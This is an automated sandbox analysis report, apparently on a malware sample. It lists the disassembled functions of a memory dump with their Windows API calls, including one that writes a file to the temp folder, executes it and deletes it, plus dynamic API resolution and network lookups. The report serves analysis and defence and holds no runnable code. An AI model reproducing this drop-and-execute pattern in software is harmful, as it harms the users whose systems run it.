Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

Function 001E8390, Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 285

APIs

SysFreeString.OLEAUT32(?), ref: 001E840C
SysAllocString.OLEAUT32(?), ref: 001E8561

Part of subcall function 001EBC60: HeapFree.KERNEL32(00210000,00000008,001F06F6), ref: 001EBC73

SysFreeString.OLEAUT32(?), ref: 001E841D

Part of subcall function 001E3150: SysFreeString.OLEAUT32(?), ref: 001E31A8
Part of subcall function 001E3150: SysFreeString.OLEAUT32(?), ref: 001E31BD
Part of subcall function 001E3150: SysFreeString.OLEAUT32(?), ref: 001E3320
Part of subcall function 001E3150: SysFreeString.OLEAUT32(?), ref: 001E332E

Part of subcall function 001E2300: SysFreeString.OLEAUT32(?), ref: 001E23B8
Part of subcall function 001E2300: SysFreeString.OLEAUT32(?), ref: 001E24BB

Part of subcall function 001E5460: SysFreeString.OLEAUT32(?), ref: 001E551E
Part of subcall function 001E5460: SysFreeString.OLEAUT32(?), ref: 001E552F
Part of subcall function 001E5460: _wtoi.MSVCRT ref: 001E563B
Part of subcall function 001E5460: SysFreeString.OLEAUT32(?), ref: 001E5685
Part of subcall function 001E5460: SysFreeString.OLEAUT32(?), ref: 001E5693

SysFreeString.OLEAUT32(?), ref: 001E867C
SysFreeString.OLEAUT32(?), ref: 001E868A

Strings

p9?, xrefs: 001E8468, 001E8496, 001E84CC, 001E84FA, 001E8531, 001E8580, 001E85BA, 001E85F4

Memory Dump Source

Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

Function 001E5460, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 213

APIs

Part of subcall function 001E52C0: SysFreeString.OLEAUT32(00000000), ref: 001E52D7
Part of subcall function 001E52C0: SysFreeString.OLEAUT32(00000001), ref: 001E52E5

SysFreeString.OLEAUT32(?), ref: 001E551E
SysFreeString.OLEAUT32(?), ref: 001E552F

Part of subcall function 001EB300: SysFreeString.OLEAUT32(?), ref: 001EB318
Part of subcall function 001EB300: SysFreeString.OLEAUT32(?), ref: 001EB321

_wtoi.MSVCRT ref: 001E563B
SysFreeString.OLEAUT32(?), ref: 001E5685
SysFreeString.OLEAUT32(?), ref: 001E5693

Part of subcall function 001F1F60: LoadLibraryA.KERNEL32(?), ref: 001F1F87
Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FA8
Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FCE
Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FEC
Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F200A
Part of subcall function 001F1F60: GetProcessHeap.KERNEL32 ref: 001F2015
Part of subcall function 001F1F60: RtlReAllocateHeap.NTDLL(00210000,00000008,?,001F0639), ref: 001F202F
Part of subcall function 001F1F60: RtlAllocateHeap.NTDLL(00210000,00000008,001F0639), ref: 001F2042

Strings

p9?, xrefs: 001E557B

Memory Dump Source

Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

Function 001E9E60, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 191

APIs

SysFreeString.OLEAUT32(?), ref: 001E9F28
SysFreeString.OLEAUT32(?), ref: 001E9F39
_wtoi.MSVCRT ref: 001E9FA5

Part of subcall function 001EC060: SysFreeString.OLEAUT32(?), ref: 001EC149
Part of subcall function 001EC060: SysFreeString.OLEAUT32(?), ref: 001EC15E
Part of subcall function 001EC060: _wtoi.MSVCRT ref: 001EC215
Part of subcall function 001EC060: rand.MSVCRT ref: 001EC260
Part of subcall function 001EC060: SysFreeString.OLEAUT32(?), ref: 001EC3AE
Part of subcall function 001EC060: SysFreeString.OLEAUT32(?), ref: 001EC3BC

SysFreeString.OLEAUT32(?), ref: 001EA036
SysFreeString.OLEAUT32(?), ref: 001EA044

Strings

p9?, xrefs: 001E9ED7, 001E9F84, 001E9FC8

Memory Dump Source

Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

Function 001E29C0, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 170

APIs

SysFreeString.OLEAUT32(?), ref: 001E2A8D
SysFreeString.OLEAUT32(?), ref: 001E2A97
_wtoi.MSVCRT ref: 001E2B01
SysFreeString.OLEAUT32(?), ref: 001E2B4E
SysFreeString.OLEAUT32(?), ref: 001E2B58

Strings

p9?, xrefs: 001E2A3F, 001E2AE0

Memory Dump Source

Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

Function 001E6A70, Relevance: 9.3, APIs: 6, Instructions: 255

APIs

??2@YAPAXI@Z.MSVCRT ref: 001E6A86
??2@YAPAXI@Z.MSVCRT ref: 001E6AA1

Part of subcall function 001EBC60: HeapFree.KERNEL32(00210000,00000008,001F06F6), ref: 001EBC73

??3@YAXPAX@Z.MSVCRT ref: 001E6BB0
??3@YAXPAX@Z.MSVCRT ref: 001E6BDE
??3@YAXPAX@Z.MSVCRT ref: 001E6C48

Part of subcall function 001ECCF0: SysFreeString.OLEAUT32(?), ref: 001ECD01

??3@YAXPAX@Z.MSVCRT ref: 001E6CA1

Memory Dump Source

Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

Function 001E4C40, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 279sleep

APIs

_time64.MSVCRT ref: 001E4D6F
_time64.MSVCRT ref: 001E4DAB

Part of subcall function 001E5A90: Sleep.KERNEL32(00009C40,?,?,?,?,?,?,?,00000000,001F00C1), ref: 001E5B3F

Sleep.KERNEL32(00001388), ref: 001E4E40
_time64.MSVCRT ref: 001E4EF8

Part of subcall function 001EBC60: HeapFree.KERNEL32(00210000,00000008,001F06F6), ref: 001EBC73

Part of subcall function 001F0E20: _vsnwprintf.MSVCRT ref: 001F0E52

Strings

p9?, xrefs: 001E4C78, 001E4E8A, 001E4EA4, 001E4EB9, 001E4ECD

Memory Dump Source

Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

Function 001E2030, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 154

APIs

Part of subcall function 001E5A90: Sleep.KERNEL32(00009C40,?,?,?,?,?,?,?,00000000,001F00C1), ref: 001E5B3F

??2@YAPAXI@Z.MSVCRT ref: 001E207A
??3@YAXPAX@Z.MSVCRT ref: 001E21CF

Part of subcall function 001F1F60: LoadLibraryA.KERNEL32(?), ref: 001F1F87
Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FA8
Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FCE
Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FEC
Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F200A
Part of subcall function 001F1F60: GetProcessHeap.KERNEL32 ref: 001F2015
Part of subcall function 001F1F60: RtlReAllocateHeap.NTDLL(00210000,00000008,?,001F0639), ref: 001F202F
Part of subcall function 001F1F60: RtlAllocateHeap.NTDLL(00210000,00000008,001F0639), ref: 001F2042

??3@YAXPAX@Z.MSVCRT ref: 001E2176
_time64.MSVCRT ref: 001E21A8

Part of subcall function 001ECCF0: SysFreeString.OLEAUT32(?), ref: 001ECD01

Part of subcall function 001EBC60: HeapFree.KERNEL32(00210000,00000008,001F06F6), ref: 001EBC73

Strings

p9?, xrefs: 001E214E, 001E217D

Memory Dump Source

Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

Function 001E3150, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 154

APIs

Part of subcall function 001EB300: SysFreeString.OLEAUT32(?), ref: 001EB318
Part of subcall function 001EB300: SysFreeString.OLEAUT32(?), ref: 001EB321

SysFreeString.OLEAUT32(?), ref: 001E31A8
SysFreeString.OLEAUT32(?), ref: 001E31BD

Part of subcall function 001F0DF0: SysAllocString.OLEAUT32(?), ref: 001F0E03

Part of subcall function 001EF560: SysAllocString.OLEAUT32(?), ref: 001EF574

SysFreeString.OLEAUT32(?), ref: 001E3320
SysFreeString.OLEAUT32(?), ref: 001E332E

Strings

p9?, xrefs: 001E3208, 001E323C, 001E3275, 001E32AB, 001E32E0

Memory Dump Source

Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

Function 001F2AD0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85

APIs

??2@YAPAXI@Z.MSVCRT ref: 001F2ADD
??3@YAXPAX@Z.MSVCRT ref: 001F2B54
_time64.MSVCRT ref: 001F2B82

Part of subcall function 001ECCF0: SysFreeString.OLEAUT32(?), ref: 001ECD01

??3@YAXPAX@Z.MSVCRT ref: 001F2BAA

Strings

p9?, xrefs: 001F2B32, 001F2B5E

Memory Dump Source

Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

Function 001F26D0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 66

APIs

memset.MSVCRT ref: 001F26EC
GetTempPathA.KERNEL32(00000104,?), ref: 001F2700

Part of subcall function 001F2600: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,10000080,00000000), ref: 001F261A
Part of subcall function 001F2600: WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 001F2631
Part of subcall function 001F2600: CloseHandle.KERNEL32(00000000), ref: 001F2638

Part of subcall function 001F2650: memset.MSVCRT ref: 001F265F
Part of subcall function 001F2650: CreateProcessA.KERNEL32(00000000,001F2798,00000000,00000000,00000000,00000010,00000000,00000000,?,?), ref: 001F2698
Part of subcall function 001F2650: WaitForSingleObject.KERNEL32(?,00002710), ref: 001F26AE
Part of subcall function 001F2650: CloseHandle.KERNEL32(?), ref: 001F26BE
Part of subcall function 001F2650: CloseHandle.KERNEL32(?), ref: 001F26C4

DeleteFileA.KERNEL32(qega,regi,qega,?,?), ref: 001F279F

Strings

regi, xrefs: 001F2788, 001F2790
qega, xrefs: 001F2753, 001F2759

Memory Dump Source

Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

Function 001E16E0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 37

APIs

WinHttpCloseHandle.WINHTTP(?,00000000,001ECFBA,001F311D), ref: 001E16F2
WinHttpCloseHandle.WINHTTP(?,00000000,001ECFBA,001F311D), ref: 001E16FC
WinHttpCloseHandle.WINHTTP(?,00000000,001ECFBA,001F311D), ref: 001E1706

Part of subcall function 001EBC60: HeapFree.KERNEL32(00210000,00000008,001F06F6), ref: 001EBC73

Strings

q*\n)W\n, xrefs: 001E16E7
p9?, xrefs: 001E1718, 001E172A

Memory Dump Source

Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

Function 001E9AB0, Relevance: 7.6, APIs: 5, Instructions: 143network

APIs

WSAStartup.WS2_32(00000202,?), ref: 001E9ADA
freeaddrinfo.WS2_32(00000000,001F043A), ref: 001E9B3B

Part of subcall function 001F0E20: _vsnwprintf.MSVCRT ref: 001F0E52

getaddrinfo.WS2_32(001F043A,00000000,?,00000000), ref: 001E9BD6
freeaddrinfo.WS2_32(00000000), ref: 001E9C1E
WSACleanup.WS2_32 ref: 001E9C44

Part of subcall function 001EBC60: HeapFree.KERNEL32(00210000,00000008,001F06F6), ref: 001EBC73

Part of subcall function 001F1F60: LoadLibraryA.KERNEL32(?), ref: 001F1F87
Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FA8
Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FCE
Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FEC
Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F200A
Part of subcall function 001F1F60: GetProcessHeap.KERNEL32 ref: 001F2015
Part of subcall function 001F1F60: RtlReAllocateHeap.NTDLL(00210000,00000008,?,001F0639), ref: 001F202F
Part of subcall function 001F1F60: RtlAllocateHeap.NTDLL(00210000,00000008,001F0639), ref: 001F2042

Memory Dump Source

Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

Function 001F14C0, Relevance: 7.6, APIs: 5, Instructions: 74network

APIs

WSAStartup.WS2_32(00000202,?), ref: 001F14E2
gethostname.WS2_32(?,000000FF), ref: 001F1502
getaddrinfo.WS2_32(?,00000000,00000000,00000000), ref: 001F1522
freeaddrinfo.WS2_32(00000000), ref: 001F1580
WSACleanup.WS2_32 ref: 001F1586

Memory Dump Source

Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

Function 001EA6B0, Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 382

APIs

Part of subcall function 001E4FA0: memcpy.MSVCRT ref: 001E5018
Part of subcall function 001E4FA0: memcpy.MSVCRT ref: 001E5035

_time64.MSVCRT ref: 001EA97C
_time64.MSVCRT ref: 001EAA0E

Part of subcall function 001EBC60: HeapFree.KERNEL32(00210000,00000008,001F06F6), ref: 001EBC73

Part of subcall function 001F1F60: LoadLibraryA.KERNEL32(?), ref: 001F1F87
Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FA8
Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FCE
Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FEC
Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F200A
Part of subcall function 001F1F60: GetProcessHeap.KERNEL32 ref: 001F2015
Part of subcall function 001F1F60: RtlReAllocateHeap.NTDLL(00210000,00000008,?,001F0639), ref: 001F202F
Part of subcall function 001F1F60: RtlAllocateHeap.NTDLL(00210000,00000008,001F0639), ref: 001F2042

_time64.MSVCRT ref: 001EAAEE

Strings

p9?, xrefs: 001EA7AE, 001EA7EB, 001EA8D3, 001EA8FF, 001EA943, 001EA9DF

Memory Dump Source

Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

Function 001F10D0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 130

APIs

_wtoi.MSVCRT ref: 001F113E
_wtoi.MSVCRT ref: 001F1149

Part of subcall function 001F1F60: LoadLibraryA.KERNEL32(?), ref: 001F1F87
Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FA8
Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FCE
Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FEC
Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F200A
Part of subcall function 001F1F60: GetProcessHeap.KERNEL32 ref: 001F2015
Part of subcall function 001F1F60: RtlReAllocateHeap.NTDLL(00210000,00000008,?,001F0639), ref: 001F202F
Part of subcall function 001F1F60: RtlAllocateHeap.NTDLL(00210000,00000008,001F0639), ref: 001F2042

memcpy.MSVCRT ref: 001F11B4

Part of subcall function 001EBC60: HeapFree.KERNEL32(00210000,00000008,001F06F6), ref: 001EBC73

Strings

p9?, xrefs: 001F1176

Memory Dump Source

Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

Function 001E7EC0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110library

APIs

LoadLibraryW.KERNEL32(?), ref: 001E7EEB
GetProcAddress.KERNEL32(00000000,?), ref: 001E7F11
GetLastError.KERNEL32 ref: 001E7F44

Part of subcall function 001EBC60: HeapFree.KERNEL32(00210000,00000008,001F06F6), ref: 001EBC73

Part of subcall function 001F1F60: LoadLibraryA.KERNEL32(?), ref: 001F1F87
Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FA8
Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FCE
Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FEC
Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F200A
Part of subcall function 001F1F60: GetProcessHeap.KERNEL32 ref: 001F2015
Part of subcall function 001F1F60: RtlReAllocateHeap.NTDLL(00210000,00000008,?,001F0639), ref: 001F202F
Part of subcall function 001F1F60: RtlAllocateHeap.NTDLL(00210000,00000008,001F0639), ref: 001F2042

Strings

p9?, xrefs: 001E7F67

Memory Dump Source

Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

Function 001EDA20, Relevance: 6.1, APIs: 4, Instructions: 98

APIs

Part of subcall function 001E5A90: Sleep.KERNEL32(00009C40,?,?,?,?,?,?,?,00000000,001F00C1), ref: 001E5B3F

??2@YAPAXI@Z.MSVCRT ref: 001EDA7A
??3@YAXPAX@Z.MSVCRT ref: 001EDAB9

Part of subcall function 001EBC60: HeapFree.KERNEL32(00210000,00000008,001F06F6), ref: 001EBC73

_time64.MSVCRT ref: 001EDADB
??3@YAXPAX@Z.MSVCRT ref: 001EDB0B

Memory Dump Source

Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

Function 001F0D10, Relevance: 6.1, APIs: 4, Instructions: 85

APIs

Part of subcall function 001EC8C0: GetFullPathNameW.KERNEL32(?,00000105,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?), ref: 001EC938

_time64.MSVCRT ref: 001F0D4F

Part of subcall function 001E1C30: ??2@YAPAXI@Z.MSVCRT ref: 001E1C52
Part of subcall function 001E1C30: ??3@YAXPAX@Z.MSVCRT ref: 001E1C9A

Part of subcall function 001E7A20: SysFreeString.OLEAUT32(?), ref: 001E7A3C

??3@YAXPAX@Z.MSVCRT ref: 001F0D82

Part of subcall function 001EF0B0: ??2@YAPAXI@Z.MSVCRT ref: 001EF1C7
Part of subcall function 001EF0B0: ??3@YAXPAX@Z.MSVCRT ref: 001EF206
Part of subcall function 001EF0B0: ??3@YAXPAX@Z.MSVCRT ref: 001EF29B

_time64.MSVCRT ref: 001F0D9D
??3@YAXPAX@Z.MSVCRT ref: 001F0DCC

Part of subcall function 001EBC60: HeapFree.KERNEL32(00210000,00000008,001F06F6), ref: 001EBC73

Memory Dump Source

Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

Function 001F1D50, Relevance: 6.1, APIs: 4, Instructions: 84

APIs

Part of subcall function 001E5A90: Sleep.KERNEL32(00009C40,?,?,?,?,?,?,?,00000000,001F00C1), ref: 001E5B3F

??2@YAPAXI@Z.MSVCRT ref: 001F1D7F
??3@YAXPAX@Z.MSVCRT ref: 001F1DBE

Part of subcall function 001EBC60: HeapFree.KERNEL32(00210000,00000008,001F06F6), ref: 001EBC73

_time64.MSVCRT ref: 001F1DE0
??3@YAXPAX@Z.MSVCRT ref: 001F1E0D

Memory Dump Source

Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

Function 001F3754, Relevance: 6.0, APIs: 4, Instructions: 49

APIs

Part of subcall function 001E995A: GetModuleHandleA.KERNEL32(00000000), ref: 001E9961

__set_app_type.MSVCRT ref: 001F37C0
__p__fmode.MSVCRT ref: 001F37D6
__p__commode.MSVCRT ref: 001F37E4
__setusermatherr.MSVCRT ref: 001F3805

Part of subcall function 001E1401: _controlfp.MSVCRT ref: 001E140B

Memory Dump Source

Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

Function 001E7CF0, Relevance: 6.0, APIs: 4, Instructions: 31

APIs

InterlockedDecrement.KERNEL32(?), ref: 001E7CFE
SysFreeString.OLEAUT32(00000000), ref: 001E7D13
??_V@YAXPAX@Z.MSVCRT ref: 001E7D21
??3@YAXPAX@Z.MSVCRT ref: 001E7D2A

Memory Dump Source

Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

Function 001F1690, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 215

APIs

Part of subcall function 001F1F60: LoadLibraryA.KERNEL32(?), ref: 001F1F87
Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FA8
Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FCE
Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F1FEC
Part of subcall function 001F1F60: GetProcAddress.KERNEL32(00000000,?), ref: 001F200A
Part of subcall function 001F1F60: GetProcessHeap.KERNEL32 ref: 001F2015
Part of subcall function 001F1F60: RtlReAllocateHeap.NTDLL(00210000,00000008,?,001F0639), ref: 001F202F
Part of subcall function 001F1F60: RtlAllocateHeap.NTDLL(00210000,00000008,001F0639), ref: 001F2042

wsprintfW.USER32 ref: 001F1829

Part of subcall function 001EBC60: HeapFree.KERNEL32(00210000,00000008,001F06F6), ref: 001EBC73

rand.MSVCRT ref: 001F1880

Strings

p9?, xrefs: 001F1749, 001F1788, 001F17B2

Memory Dump Source

Source File: 00000012.00000002.10395822700.001E1000.00000020.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000012.00000002.10395799752.001E0000.00000002.sdmp
Associated: 00000012.00000002.10395865455.001F4000.00000002.sdmp
Associated: 00000012.00000002.10395893359.001F8000.00000004.sdmp
Associated: 00000012.00000002.10395918171.001F9000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_1e0000_ounehcnaykuM.jbxd

Function 001E2300, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 175

APIs

Part of subcall function 001EA660: SysFreeString.OLEAUT32(00000000), ref: 001EA679
